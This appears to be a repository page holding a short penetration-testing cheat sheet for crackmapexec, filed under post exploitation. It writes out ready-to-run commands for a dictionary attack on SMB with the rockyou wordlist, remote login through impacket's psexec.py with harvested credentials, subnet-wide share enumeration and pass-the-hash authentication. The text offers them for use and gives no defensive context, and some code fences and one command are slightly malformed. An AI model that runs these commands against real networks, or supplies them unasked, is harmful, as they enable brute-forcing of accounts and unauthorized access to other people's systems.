whx
/
killchain-compendium
1
0
Fork 0
Code Issues Pull Requests Projects Releases Wiki Activity
killchain-compendium/post exploitation/docs/crackmapexec.md

536 B
Raw Blame History

Crackmapexec

  • Dictionary attack against SMB
cme smb domain.name -u <user> s -p /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt
  • Use the password with impacket/examples/psexec.py in the following way
psexec.py domain.name/<user>:<password>@<target-IP>

Shares

  • Check user permissions on shares ``sh crackmapexec smb 10.200.x.0/24 -u -p --shares

## SMB
* Check user hash on the network via smb
```sh
 crackmapexec smb 10.200.x.0/24 -u <user> -d <domain> -H <hash>